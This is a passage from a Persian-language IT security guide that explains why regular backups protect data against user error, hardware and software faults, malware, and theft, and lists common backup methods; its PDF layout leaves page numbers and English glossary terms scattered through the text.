ﺩﺭ ﻗﺴﻤﺖ ﻗﺒﻞ ﻣﻄﺎﻟﺒﻲ ﺩﺭ ﻣﻮﺭﺩ ﺍﻳﺠﺎﺩ ﺍﻣﻨﻴﺖ ﻓﻴﺰﻳﻜﻲ ﺁﻣـﺪ .ﺩﺭ
ﺍﻳﻦ ﻗﺴﻤﺖ ﻣﻮﺍﺭﺩﻱ ﺷﺮﺡ ﺩﺍﺩﻩ ﺧﻮﺍﻫﻨﺪ ﺷـﺪ ﻛـﻪ ﺑﻮﺳـﻴﻠﺔ ﺁﻧﻬـﺎ
ﻣﻲﺗﻮﺍﻥ ﺍﻃﻤﻴﻨﺎﻥ ﺣﺎﺻﻞ ﻛﺮﺩ ﻛﻪ ﺩﺍﺩﻩﻫﺎ ﻭ ﺑﺮﻧﺎﻣﻪﻫﺎ ﺍﺯ ﺣﻔﺎﻇﺖ
ﻛﺎﻣﻞ ﺑﺮﺧﻮﺭﺩﺍﺭﻧﺪ .ﺷﻤﺎ ﭼﮕﻮﻧﻪ ﺍﺯ ﺩﺍﺩﻩﻫﺎ ﻭ ﺑﺮﻧﺎﻣـﻪﻫـﺎﻱ ﺭﺍﻳﺎﻧـﺔ
ﺧﻮﺩ ﺣﻔﺎﻇﺖ ﻣﻲﻛﻨﻴﺪ؟
ﺑﻪ ﭼﻨﺪ ﺩﻟﻴﻞ ﻣﻤﻜﻦ ﺍﺳﺖ ﺩﺍﺩﻩﻫﺎ ﺍﺯ ﺑﻴﻦ ﺑﺮﻭﻧﺪ ﻛﻪ ﺑﺮﺧﻲ ﺍﺯ ﺁﻧﻬﺎ
ﺩﺭ ﺯﻳﺮ ﺁﻣﺪﻩ ﺍﺳﺖ:
•
•
Case
Logical Access
Personal Digital Assistants
14
15
16
ﭘﺎﻙ ﺷﺪﻥ ﺍﺗﻔﺎﻗﻲ ﻓﺎﻳﻞ؛
ﺩﺯﺩﻳﺪﻩ ﺷﺪﻥ ﺭﺍﻳﺎﻧﻪ؛
Backups
17
٥٧
ﺑﺨﺶ ﺩﻭﻡ :ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﮐﺎﺭﺑﺮﺍﻥ ﻣﻨﻔﺮﺩ
•
•
•
•
•
ﻳﻜﻲ ﺍﺯ ﺭﺍﻩﺣﻠﻬﺎ ﺑﺮﺍﻱ ﻣﻘﺎﺑﻠﻪ ﺑﺎ ﺍﻳﻦ ﺗﻬﺪﻳﺪﺍﺕ ،ﺗﻬﻴﺔ ﻧﺴﺨﻪﻫـﺎﻱ
ﭘﺸﺘﻴﺒﺎﻥ ﻣﻲﺑﺎﺷﺪ .ﻧﺴﺨﻪ ﭘﺸﺘﻴﺒﺎﻥ ﺑﻪ ﺧﻮﺩﻱ ﺧﻮﺩ ﻳﻚ ﻛﭙـﻲ ﺍﺯ
ﻓﺎﻳﻞ ﻳﺎ ﻣﺠﻤﻮﻋﻪﺍﻱ ﺍﺯ ﻓﺎﻳﻠﻬﺎ ﺍﺳﺖ ﻛﻪ ﺑﺎ ﺍﻧﺘﻘﺎﻝ ﺑﻪ ﻳﻚ ﺩﻳﺴﻚ
ﻓﻼﭘﻲ ﻭ ﻳﺎ ﺩﻳﺴﻚ ﻓﺸﺮﺩﻩ ﺍﺯ ﺁﻥ ﻧﮕﻬﺪﺍﺭﻱ ﻣـﻲﺷـﻮﺩ .ﭼﻨﺎﻧﭽـﻪ
ﻓﺎﻳﻞ ﺍﺻﻠﻲ ﺑﻪ ﻫﺮ ﺩﻟﻴﻠﻲ ﺍﺯ ﺑﻴﻦ ﺑﺮﻭﺩ ﻳﺎ ﭘﺎﻙ ﺷﻮﺩ ﻣـﻲﺗـﻮﺍﻥ ﺍﺯ
ﻧﺴﺨﻪ ﭘﺸﺘﻴﺒﺎﻥ ﺍﺳﺘﻔﺎﺩﻩ ﻛﺮﺩ ﻭ ﺁﻧﺮﺍ ﺟﺎﻳﮕﺰﻳﻦ ﻓﺎﻳﻞ ﻗﺒﻠﻲ ﻧﻤﻮﺩ.
ﻗﺎﻧﻮﻥ ﺩﻭﻡ:
ﻣﺮﺗﺒ ﹰﺎ ﭘﺸﺘﻴﺒﺎﻥ ﺗﻬﻴﻪ ﻛﻨﻴﺪ ﻭ ﺍﮔﺮ ﺭﺍﻳﺎﻧـﻪ ﺩﺭ ﻣﻌـﺮﺽ
ﺗﻬﺪﻳﺪ ﻗﺮﺍﺭ ﺩﺍﺭﺩ ﻧﻜﺎﺕ ﺣﻔﺎﻇﺘﻲ ﺭﺍ ﺑﻜﺎﺭ ﮔﻴﺮﻳﺪ.
ﻧﺴﺨﻪﻫﺎﻱ ﭘﺸﺘﻴﺒﺎﻥ ﻣﻲ ﺗﻮﺍﻧﻨﺪ ﺑﺴﻴﺎﺭ ﺳﺎﺩﻩ ﻭ ﻳﺎ ﺑـﺴﻴﺎﺭ ﭘﻴﭽﻴـﺪﻩ
ﺑﺎﺷﻨﺪ )ﺍﺯ ﺳﺎﺩﻩﺗﺮﻳﻦ ﺍﻧﻮﺍﻉ ﭘﺸﺘﻴﺒﺎﻥ ﻣﻲﺗﻮﺍﻥ ﺑﻪ ﻳﻚ ﺩﻳﺴﻚ ﻓﻼﭘـﻲ ﻛـﻪ ﺍﺯ
ﺁﻥ ﺩﺭ ﻛﺸﻮﻱ ﻣﻴـﺰ ﻛـﺎﺭ ﺧـﻮﺩ ﻧﮕﻬـﺪﺍﺭﻱ ﻣـﻲﻛﻨﻴـﺪ ﺍﺷـﺎﺭﻩ ﻛـﺮﺩ( .ﺍﻛﺜـﺮ
ﺑﺴﺘﻪﻫﺎﻱ ﻧﺮﻡ ﺍﻓﺰﺍﺭﻱ ﭘﺸﺘﻴﺒﺎﻥﮔﻴﺮ ﺑﻪ ﺷﻤﺎ ﺍﺟﺎﺯﻩ ﻣﻲﺩﻫﻨﺪ ﻓﺎﻳﻠﻲ
ﺭﺍ ﻛﻪ ﺩﺭ ﺭﺍﻳﺎﻧﻪ ﺧﻮﺩ ﺩﺍﺭﻳﺪ ﺑﻪ ﺭﻭﻱ ﻧﻮﺍﺭﻫـﺎﻱ ﻣﻐﻨﺎﻃﻴـﺴﻲ ﻭ ﻳـﺎ
ﻣﺠﻤﻮﻋﻪﺍﻱ ﺍﺯ ﺩﻳﺴﻜﻬﺎﻱ ﻓﺸﺮﺩﻩ ١٩ﻛﭙﻲ ﻛﻨﻴﺪ .ﭼﻨﺎﻧﭽـﻪ ﺭﺍﻳﺎﻧـﺔ
ﺷﻤﺎ ﺩﺯﺩﻳﺪﻩ ﺷﻮﺩ ،ﺑﺎ ﺧﺮﻳﺪ ﻳﻚ ﺭﺍﻳﺎﻧﺔ ﺟﺪﻳﺪ ﺑﺎ ﺳﺎﺧﺘﺎﺭﻱ ﻣـﺸﺎﺑﻪ
ﺭﺍﻳﺎﻧﺔ ﻗﺪﻳﻤﻲ ﻭ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻧﺴﺨﻪﻫﺎﻱ ﭘﺸﺘﻴﺒﺎﻥ ﻗﺎﺩﺭ ﺧﻮﺍﻫﻴـﺪ
ﺑﻮﺩ ﻓﺎﻳﻠﻬﺎﻱ ﺍﺯ ﺩﺳﺖ ﺭﻓﺘﻪ ﺭﺍ ﻣﺠﺪﺩﹰﺍ ﺑﻜﺎﺭ ﮔﻴﺮﻳﺪ.
ﻧﻘﺎﻳﺺ ،ﺗﺼﺎﺩﻓﺎﺕ ،ﺑﻼﻳﺎﻱ ﻃﺒﻴﻌﻲ ﻭ ﺣﻤﻼﺕ ﻣﻬـﺎﺟﻤﻴﻦ ﻗﺎﺑـﻞ
ﻻ ﻋﻠﻴـﺮﻏﻢ ﺗﻼﺷـﻬﺎﻱ ﺯﻳـﺎﺩ ﺑـﺮﺍﻱ
ﭘﻴﺶ ﺑﻴﻨـﻲ ﻧﻴـﺴﺘﻨﺪ .ﻣﻌﻤـﻮ ﹰ
ﺑﺮﻗﺮﺍﺭﻱ ﺍﻣﻨﻴﺖ ﻧﻤﻲﺗﻮﺍﻥ ﺍﺯ ﺑﺮﻭﺯ ﺑﻌﻀﻲ ﺍﺯ ﻣﺸﻜﻼﺕ ﺟﻠﻮﮔﻴﺮﻱ
ﻧﻤﻮﺩ ،ﻭﻟﻲ ﺍﮔﺮ ﭘـﺸﺘﻴﺒﺎﻥ ﻣﻨﺎﺳـﺐ ﺗﻬﻴـﻪ ﻛـﺮﺩﻩ ﺑﺎﺷـﻴﺪ ﺣـﺪﺍﻗﻞ
Hard Disk
CD-ROMs
18
19
ﺩﻻﻳﻞ ﮔﻮﻧﺎﮔﻮﻧﻲ ﻭﺟﻮﺩ ﺩﺍﺭﻧﺪ ﻛﻪ ﺑﺎﻋﺚ ﻣﻲﺷـﻮﻧﺪ ﻧـﺴﺨﻪﻫـﺎﻱ
ﭘﺸﺘﻴﺒﺎﻥ ﺍﺟﺰﺍﻱ ﻛﻠﻴﺪﻱ ﻭ ﻣﻬﻤﻲ ﺩﺭ ﺍﻣﻨﻴﺖ ﺭﺍﻳﺎﻧﻪﻫـﺎ ﻣﺤـﺴﻮﺏ
ﺷﻮﻧﺪ:
ﺧﻄﺎﻱ ﻛﺎﺭﺑﺮ
ﺑﻌﻀﻲ ﺍﺯ ﺍﻓﺮﺍﺩ ﺑﺮﺧﻲ ﻣﻮﺍﻗﻊ ﺑﻄـﻮﺭ ﻧﺎﺧﻮﺍﺳـﺘﻪ ﻓﺎﻳﻠﻬـﺎﻱ ﺧـﻮﺩ ﺭﺍ
ﭘﺎﻙ ﻣﻲﻛﻨﻨﺪ .ﺩﺭ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻭﺍﺳـﻄﻬﺎﻱ ﮔﺮﺍﻓﻴﻜـﻲ ﻛـﺎﺭﺑﺮ ﺍﻳـﻦ
ﺍﻣﻜﺎﻥ ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﻛﻪ ﻳﻚ ﻓﺎﻳﻞ ﻳﺎ ﺷـﺎﺧﻪ ﺑﻄـﻮﺭ ﻧﺎﺧﻮﺍﺳـﺘﻪ ﺑـﻪ
ﻣﻜﺎﻧﻲ ﻧﺎﺩﺭﺳﺖ ﻣﻨﺘﻘﻞ ﺷﻮﺩ .ﺍﻣﺎ ﭼﻨﺎﻧﭽﻪ ﻣﺮﺗﺒﹰﺎ ﺍﺯ ﻓﺎﻳﻠﻬﺎ ﭘﺸﺘﻴﺒﺎﻥ
ﺗﻬﻴﻪ ﺷﺪﻩ ﺑﺎﺷﺪ ﺍﻣﻜﺎﻥ ﺑﺎﺯﻳﺎﺑﻲ ﻓﺎﻳﻠﻬﺎﻳﻲ ﻛﻪ ﺑﻄﻮﺭ ﺍﺗﻔﺎﻗﻲ ﭘـﺎﻙ
ﺷﺪﻩﺍﻧﺪ ﻭﺟﻮﺩ ﺧﻮﺍﻫﺪ ﺩﺍﺷﺖ .ﺍﻧﺠﺎﻡ ﺍﻳﻨﻜﺎﺭ ﺩﺭ ﻣﻘﺎﺑﻠﻪ ﺑﺎ ﺍﺷﺘﺒﺎﻫﺎﺕ
ﻛﻮﭼﻚ ﻧﻴﺰ ﻣﻲﺗﻮﺍﻧﺪ ﺭﺍﻫﻜﺎﺭ ﭘﻴﺸﮕﻴﺮﺍﻧﻪ ﺧﻮﺑﻲ ﺑﺎﺷﺪ.
ﻧﻘﺺ ﺩﺭ ﺳﺨﺖﺍﻓﺰﺍﺭ
ﺳﺨﺖﺍﻓﺰﺍﺭ ﻣﻮﺭﺩ ﺍﺳـﺘﻔﺎﺩﻩ ﺩﺭ ﻫـﺮ ﺯﻣـﺎﻧﻲ ﻣﻤﻜـﻦ ﺍﺳـﺖ ﺩﭼـﺎﺭ
ﺧﺮﺍﺑﻲ ﺷﻮﺩ ﻭ ﺑﺎﻋﺚ ﺍﺯ ﺑﻴﻦ ﺭﻓﺘﻦ ﺩﺍﺩﻩﻫﺎ ﺩﺭ ﻃﻮﻝ ﻳـﻚ ﻓﺮﺁﻳﻨـﺪ
ﮔﺮﺩﺩ .ﺻﺪﻣﻪﻫﺎﻳﻲ ﻛﻪ ﺑﻪ ﺩﻳﺴﻚ ﻭﺍﺭﺩ ﻣﻲﺷـﻮﺩ ﻧﻴـﺰ ﻣـﻲﺗﻮﺍﻧـﺪ
ﻣﻨﺠﺮ ﺑﻪ ﺗﺨﺮﻳﺐ ﻛﺎﻣﻞ ﺩﻳﺴﻚ ﺷـﻮﺩ .ﻭﻟـﻲ ﭼﻨﺎﻧﭽـﻪ ﺍﺯ ﻓﺎﻳﻠﻬـﺎ
ﭘﺸﺘﻴﺒﺎﻥ ﺗﻬﻴـﻪ ﺷـﺪﻩ ﺑﺎﺷـﺪ ﻣـﻲﺗـﻮﺍﻥ ﺩﺍﺩﻩﻫـﺎ ﺭﺍ ﻣﺠـﺪﺩﹰﺍ ﺭﻭﻱ
ﺩﻳﺴﻚﮔﺮﺩﺍﻥ ﻭ ﻳﺎ ﺳﻴﺴﺘﻢ ﺟﺪﻳﺪ ﺑﺎﺯﻳﺎﺑﻲ ﻧﻤﻮﺩ.
ﻧﻘﺺ ﺩﺭ ﻧﺮﻡﺍﻓﺰﺍﺭ
ﺍﻛﺜﺮ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﻛﺎﺭﺑﺮﺩﻱ ﻣﺜﻞ Microsoft Wordﻭ Excel
ﻭ Accessﻣﻲﺗﻮﺍﻧﻨﺪ ﺑﺎﻋﺚ ﺍﺯ ﺑﻴﻦ ﺭﻓـﺘﻦ ﻧﺎﺧﻮﺍﺳـﺘﺔ ﻓﺎﻳﻠﻬـﺎﻱ
ﺩﺍﺩﻩ ﺷﻮﻧﺪ .ﺍﮔﺮ ﻧﺴﺨﺔ ﭘﺸﺘﻴﺒﺎﻥ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ ﻭ ﺑﺮﻧﺎﻣﺔ ﻛـﺎﺭﺑﺮﺩﻱ
ﻞ ﻛﺎﺭﻱ ﺷﻤﺎ ﺭﺍ ﭘـﺎﻙ
ﺷﻤﺎ ﻧﺎﮔﻬﺎﻥ ﻧﻴﻤﻲ ﺍﺯ ﺍﻃﻼﻋﺎﺕ ﺣﻴﺎﺗﻲ ﻓﺎﻳ ﹺ
ﻛﻨﺪ ،ﺑﺎﺯ ﻫﻢ ﻗﺎﺩﺭ ﺧﻮﺍﻫﻴﺪ ﺑﻮﺩ ﺩﺍﺩﻩﻫﺎﻱ ﺧﻮﺩ ﺭﺍ ﺑﺎﺯﻳﺎﺑﻲ ﻧﻤﺎﻳﻴﺪ.
ﺑﺨﺶ ﺩﻭﻡ
•
ﺫﺧﻴﺮﺓ ﻧﺎﺧﻮﺍﺳﺘﻪ ﻳﻚ ﻓﺎﻳﻞ ﺑﺮ ﺭﻭﻱ ﻓﺎﻳﻞ ﺩﻳﮕﺮ؛
ﺭﻭﻧﺪ ﻧﺎﺩﺭﺳﺖ ﺑﻪ ﺍﺟﺮﺍ ﺩﺭ ﺁﻣﺪﻥ ﻳﻚ ﺑﺮﻧﺎﻣﻪ ﺑﮕﻮﻧﻪﺍﻱ ﻛﻪ
ﺑﺎﻋﺚ ﺗﻐﻴﻴﺮ ﻳﺎ ﭘﺎﻙ ﺷﺪﻥ ﺩﺍﺩﻩﻫﺎ ﺷﻮﺩ؛
ﻭﺟﻮﺩ ﻳﻚ ﺑﺮﻧﺎﻣﺔ ﻣﺨﺮﺏ )ﻣﺜﻞ ﻭﻳﺮﻭﺱ( ﻛﻪ ﺑﺎﻋﺚ ﺗﻐﻴﻴـﺮ،
ﺑﺎﺯﻧﻮﻳﺴﻲ ﻭ ﻳﺎ ﺣﺬﻑ ﺩﺍﺩﻩﻫﺎ ﺷﻮﺩ؛
١٨
ﺑﺮﻭﺯ ﻣﺸﻜﻞ ﺩﺭ ﺳﺨﺖﺍﻓﺰﺍﺭ )ﻣﺜﻞ ﻣﺸﻜﻼﺕ ﺩﻳﺴﻚ ﺳﺨﺖ ،
ﺩﻳﺴﻚﮔﺮﺩﺍﻥ ،ﭘﺮﺩﺍﺯﺷﮕﺮ ﻭ ﻳﺎ ﻣﻨﺒﻊ ﺗﻐﺬﻳﻪ( ﺑﮕﻮﻧﻪﺍﻱ ﻛﻪ ﺑﺎﻋـﺚ
ﺍﺯ ﺑﻴﻦ ﺭﻓﺘﻦ ﺩﺍﺩﻩﻫﺎ ﮔﺮﺩﺩ؛
ﺁﺗﺶﺳﻮﺯﻱ ﻭ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺁﺏ ﺑﺮﺍﻱ ﺧﺎﻣﻮﺵ ﻛﺮﺩﻥ ﺭﺍﻳﺎﻧﺔ
ﺳــﻮﺧﺘﻪ ،ﻛــﻪ ﺑﺎﻋــﺚ ﻏﻴﺮﻗﺎﺑــﻞ ﺑﺎﺯﻳــﺎﺑﻲ ﺷــﺪﻥ ﺩﺍﺩﻩﻫــﺎ
ﻣﻲﺷﻮﺩ؛
ﻭ ...
ﺩﺍﺩﻩﻫﺎﻱ ﺧﻮﺩ ﺭﺍ ﺍﺯ ﺩﺳﺖ ﻧﻤﻲﺩﻫﻴﺪ ﻭ ﺩﺭ ﺍﻛﺜﺮ ﻣﻮﺍﻗﻊ ﻣﻲﺗﻮﺍﻧﻴـﺪ
ﺳﻴﺴﺘﻢ ﺧﻮﺩ ﺭﺍ ﺑﺎﺯﻳﺎﺑﻲ ﻛﺮﺩﻩ ﻭ ﺑﻪ ﻳﻚ ﺣﺎﻟﺖ ﻣﺘﻌﺎﺩﻝ ﻭ ﻣﺎﻧﺪﮔﺎﺭ
ﺑﺮﺳﺎﻧﻴﺪ .ﺣﺘﻲ ﺩﺭﺻﻮﺭﺗﻴﻜﻪ ﺩﺍﺩﻩﻫﺎﻱ ﺭﺍﻳﺎﻧﻪ ﺗﻤﺎﻣﹰﺎ ﺍﺯ ﺩﺳﺖ ﺭﻓﺘـﻪ
ﺑﺎﺷﺪ ،ﭼﻨﺎﻧﭽﻪ ﻳﻚ ﻣﺠﻤﻮﻋﺔ ﻛﺎﻣﻞ ﺍﺯ ﻧﺴﺨﻪﻫـﺎﻱ ﭘـﺸﺘﻴﺒﺎﻥ ﺩﺭ
ﺍﺧﺘﻴﺎﺭ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ ﻗﺎﺩﺭ ﺧﻮﺍﻫﻴﺪ ﺑـﻮﺩ ﻫﻤـﺔ ﺍﻃﻼﻋـﺎﺕ ﺭﺍ ﺭﻭﻱ
ﺭﺍﻳﺎﻧﺔ ﺟﺪﻳﺪ ﺑﺎﺯﻳﺎﺑﻲ ﻛﻨﻴﺪ ﻭ ﻣﺠﺪﺩﹰﺍ ﺑـﻪ ﺁﻧﻬـﺎ ﺩﺳﺘﺮﺳـﻲ ﺩﺍﺷـﺘﻪ
ﺑﺎﺷــﻴﺪ .ﺍﻟﺒﺘــﻪ ﺍﻳــﻦ ﻣــﺴﺌﻠﻪ ﺻــﺮﻓﹰﺎ ﺯﻣــﺎﻧﻲ ﻛﺎﺭﺁﻣــﺪ ﺍﺳــﺖ ﻛــﻪ
ﻧﺴﺨﻪﻫﺎﻱ ﭘﺸﺘﻴﺒﺎﻥ ﺩﺭ ﺟﺎﻳﻲ ﻏﻴﺮ ﺍﺯ ﺭﺍﻳﺎﻧﺔ ﻗﺮﺑﺎﻧﻲ ﺫﺧﻴﺮﻩ ﺷـﺪﻩ
ﺑﺎﺷﻨﺪ.
٥٨
ﻧﻔﻮﺫﻫﺎ ﻭ ﺗﺨﺮﻳﺒﻬﺎﻱ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ
ﻣﻬــﺎﺟﻤﻴﻦ ﻭ ﻭﻳﺮﻭﺳــﻬﺎﻱ ﻣﺨــﺮﺏ ﻣﺮﺗﺒ ـﹰﺎ ﺑﺎﻋــﺚ ﺗﻐﻴﻴــﺮ ﻭ ﻳــﺎ
ﭘﺎﻙﺷﺪﻥ ﺩﺍﺩﻩﻫﺎ ﻣﻲﺷﻮﻧﺪ .ﻭﺟﻮﺩ ﻧﺴﺨﻪﻫﺎﻱ ﭘـﺸﺘﻴﺒﺎﻥ ﺩﺭ ﺍﻳـﻦ
ﺯﻣﻴﻨﻪ ﻧﻴﺰ ﺑﻪ ﻛﺎﺭﺑﺮﺍﻥ ﻛﻤﻚ ﺷﺎﻳﺎﻧﻲ ﻣﻲﻛﻨﺪ.
ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ
ﺍﻳﻤﻨﻲ ﺩﺭ ﺑﺮﺍﺑﺮ ﺧﻄﺮﺍﺗﻲ ﻛﻪ ﺩﺭ ﺍﺩﺍﺭﻩ ﻭ ﻳـﺎ ﻣﻨـﺰﻝ ﺑـﺎ ﺁﻥ ﻣﻮﺍﺟـﻪ
ﻫﺴﺘﻴﺪ ،ﻣﺆﺛﺮﺗﺮﻳﻦ ﺭﺍﻩ ﺍﺳﺖ.
ﻼ ﭼﻨﺪ ﻣﻮﺭﺩ ﺍﺯ ﺷﻴﻮﻩﻫﺎﻱ ﺗﻬﻴﺔ ﭘﺸﺘﻴﺒﺎﻥ ﺁﻣﺪﻩ ﺍﺳﺖ:
ﺫﻳ ﹰ
•
ﻓﺎﻳﻠﻬــﺎﻱ ﺣــﺴﺎﺱ ﺧــﻮﺩ ﺭﺍ ﺭﻭﻱ ﺩﻳــﺴﻚ ﻓﻼﭘــﻲ،
ﺩﻳﺴﻜﻬﺎﻱ ﻧﻮﺭﻱ ،ﻭ ﻳﺎ ﺩﻳﺴﻜﻬﺎﻱ ﻣﻐﻨﺎﻃﻴﺴﻲ ﺑﺎ ﻇﺮﻓﻴﺖ
ﺑﺎﻻ ﻛﻪ ﻗﺎﺑﻠﻴﺖ ﭘﺎﻙﻛﺮﺩﻥ ﻧﻴﺰ ﺩﺭ ﺁﻧﻬﺎ ﻭﺟـﻮﺩ ﺩﺍﺭﺩ ﻛﭙـﻲ
ﻛﻨﻴﺪ.
•
ﻣﺤﺘﻮﻳﺎﺕ ﺩﻳﺴﻚ ﺭﺍ ﺭﻭﻱ ﻳﻚ ﺩﻳـﺴﻚ ﺍﻧﻌﻜﺎﺳـﻲ ٢٠ﻳـﺎ
ﺍﮔﺮ ﻓﻀﺎﻱ ﻛـﺎﻓﻲ ﻣﻮﺟـﻮﺩ ﺍﺳـﺖ ﺭﻭﻱ ﻳـﻚ ﺷـﺎﺧﻪ ﺩﺭ
ﻫﻤﺎﻥ ﺩﻳﺴﻚ ﻣﺎﺩﺭ ﻛﭙﻲ ﻛﻨﻴﺪ .ﺍﻟﺒﺘﻪ ﺍﻳﻨﻜﺎﺭ ﺩﺭ ﺧﺮﺍﺑﻴﻬﺎﻱ
ﺍﺳﺎﺳﻲ ﻛﻤﻚ ﭼﻨﺪﺍﻧﻲ ﻧﻤﻲﻛﻨﺪ ﻭ ﺻﺮﻓﹰﺎ ﺍﮔـﺮ ﺗﻌـﺪﺍﺩﻱ ﺍﺯ
ﻓﺎﻳﻠﻬﺎ ﺑﻄﻮﺭ ﻧﺎﺧﻮﺍﺳﺘﻪ ﭘﺎﻙ ﺷﻮﻧﺪ ﺑﻜﺎﺭ ﻣﻲﺁﻳﺪ.
•
ﻫﺮ ﺍﺯ ﭼﻨﺪﮔﺎﻩ ﺁﺭﺷﻴﻮ ﻓﺸﺮﺩﻩ ﺳـﺎﺯﻱﺷـﺪﻩﺍﻱ ﺍﺯ ﻓﺎﻳﻠﻬـﺎﻱ
ﻣﻬﻢ ﺧـﻮﺩ ﺍﻳﺠـﺎﺩ ﻛﻨﻴـﺪ .ﺍﻟﺒﺘـﻪ ﻣـﻲﺗـﻮﺍﻥ ﭘـﺸﺘﻴﺒﺎﻧﻬﺎﻱ
ﻣﺮﺑﻮﻃــﻪ ﺭﺍ ﺭﻭﻱ ﻫﻤــﺎﻥ ﺳﻴــﺴﺘﻢ ﺍﻭﻟﻴــﻪ ﻭ ﻳــﺎ ﺭﻭﻱ
ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﺩﻳﮕﺮ ﻭ ﺩﺭ ﻣﻜﺎﻧﻬﺎﻱ ﻓﻴﺰﻳﻜﻲ ﻣﺘﻔـﺎﻭﺕ ﻛﭙـﻲ
ﻧﻤﻮﺩ.
•
ﺍﺯ ﻓﺎﻳﻠﻬﺎﻱ ﺧﻮﺩ ﭘﺸﺘﻴﺒﺎﻥ ﺗﻬﻴﻪ ﻛﺮﺩﻩ ﻭ ﺍﺯ ﻃﺮﻳـﻖ ﺷـﺒﻜﻪ
ﻳﺎ ﺍﻳﻨﺘﺮﻧﺖ ﺁﻧﺮﺍ ﺑﻪ ﺭﺍﻳﺎﻧﺔ ﺩﻳﮕﺮﻱ ﻣﻨﺘﻘﻞ ﻛﻨﻴﺪ.
•
ﺍﮔﺮ ﺩﺭﻧﻈﺮ ﺩﺍﺭﻳﺪ ﻛﻪ ﺩﺭ ﻣﻘﺎﺑﻞ ﺧﺮﺍﺑﻲ ﺩﻳﺴﻜﻬﺎﻱ ﺳﺨﺖ
ﺍﺯ ﺍﻳﻤﻨﻲ ﺯﻳﺎﺩﻱ ﺑﺮﺧـﻮﺭﺩﺍﺭ ﺑﺎﺷـﻴﺪ ﺩﺭ ﺭﺍﻳﺎﻧـﺔ ﺧـﻮﺩ ﺍﺯ ﺩﻭ
ﺩﻳﺴﻚ ﺳﺨﺖ ﻭ ﺍﺯ ﻧﺮﻡﺍﻓﺰﺍﺭ ﻳﺎ ﺳﺨﺖ ﺍﻓﺰﺍﺭﻱ ﻛﻪ ﺍﺯ ﻫـﺮ
ﻓﺎﻳﻞ ﻳﻚ ﭘﺸﺘﻴﺒﺎﻥ ﺗﻬﻴﻪ ﻣﻲ ﻛﻨﺪ ﺍﺳﺘﻔﺎﺩﻩ ﻧﻤﺎﻳﻴـﺪ .ﺍﻟﺒﺘـﻪ
ﻻﺯﻡ ﺑﻪ ﺫﻛﺮ ﺍﺳﺖ ﻛﻪ ﺑﺎ ﺭﻋﺎﻳﺖ ﺗﻤﺎﻣﻲ ﺍﻳﻦ ﻣﻮﺍﺭﺩ ﺑﺎﺯﻫﻢ
ﺗﻬﻴﺔ ﻣﺪﺍﻭﻡ ﭘﺸﺘﻴﺒﺎﻥ ﺟﻬﺖ ﺣﻔﺎﻇﺖ ﺩﺭ ﺑﺮﺍﺑﺮ ﻣـﺸﻜﻼﺕ
ﺩﻳﮕﺮ ﺿﺮﻭﺭﻱ ﻣﻲﺑﺎﺷﺪ.
ﺍﻃﻼﻋﺎﺕ ﺑﺎﻳﮕﺎﻧﻲ
ﻧﺴﺨﻪﻫـﺎﻱ ﭘـﺸﺘﻴﺒﺎﻥ ﺑﻌﻨـﻮﺍﻥ ﺍﻃﻼﻋـﺎﺕ ﺑﺎﻳﮕـﺎﻧﻲﺷـﺪﻩ ﺗﻠﻘـﻲ
ﻣﻲﺷﻮﻧﺪ ﻛﻪ ﺍﻣﻜﺎﻥ ﻣﻘﺎﻳﺴﺔ ﻧـﺮﻡﺍﻓﺰﺍﺭﻫـﺎ ﻭ ﺩﺍﺩﻩﻫـﺎﻱ ﺭﺍﻳـﺞ ﺑـﺎ
ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎ ﻭ ﺩﺍﺩﻩﻫﺎﻱ ﻗﺪﻳﻤﻲ ﺭﺍ ﺑﻮﺟﻮﺩ ﻣﻲﺁﻭﺭﻧﺪ .ﺍﻳـﻦ ﻗﺎﺑﻠﻴـﺖ
ﺑﺎﻋﺚ ﻣﻲﺷﻮﺩ ﺑﺘﻮﺍﻧﻴﺪ ﻣﺸﺨﺺ ﻛﻨﻴﺪ ﻛﻪ ﭼﻪ ﭼﻴﺰﻫﺎﻳﻲ ﻋﻤﺪﹰﺍ ﻳـﺎ
ﺳﻬﻮﹰﺍ ﺩﭼﺎﺭ ﺗﻐﻴﻴﺮ ﺷﺪﻩﺍﻧﺪ .ﺑﺮﺍﻱ ﺍﻳﻦ ﻣﻨﻈـﻮﺭ ﺍﮔـﺮ ﻧﺨﻮﺍﻫﻴـﺪ ﺑـﻪ
ﻋﻘــﺐ ﺑﺮﮔــﺸﺘﻪ ﻭ ﺗﺎﺭﻳﺨﭽــﺔ ﻳــﻚ ﭘــﺮﻭﮊﻩ ﺭﺍ ﺑﺎﺯﺳــﺎﺯﻱ ﻛﻨﻴــﺪ
ﻧﺴﺨﻪﻫﺎﻱ ﭘﺸﺘﻴﺒﺎﻥ ﻣﻨﺎﺑﻊ ﺍﺭﺯﺷﻤﻨﺪﻱ ﺑﺸﻤﺎﺭ ﻣﻲﺁﻳﻨﺪ.
ﺳﺮﻗﺖ
ﺳﺮﻗﺖ ﺭﺍﻳﺎﻧﻪﻫﺎ ﻭ ﻓﺮﻭﺵ ﺁﻧﻬﺎ ﻛﺎﺭ ﺑﺴﻴﺎﺭ ﺁﺳﺎﻧﻲ ﺍﺳﺖ .ﺑـﺎ ﺗﻮﺟـﻪ
ﺑﻪ ﺍﻳﻦ ﻣﺴﺌﻠﻪ ،ﺗﻬﻴﺔ ﻧـﺴﺨﻪﻫـﺎﻱ ﭘـﺸﺘﻴﺒﺎﻥ ﻭ ﺫﺧﻴـﺮﺓ ﺁﻧﻬـﺎ ﺩﺭ
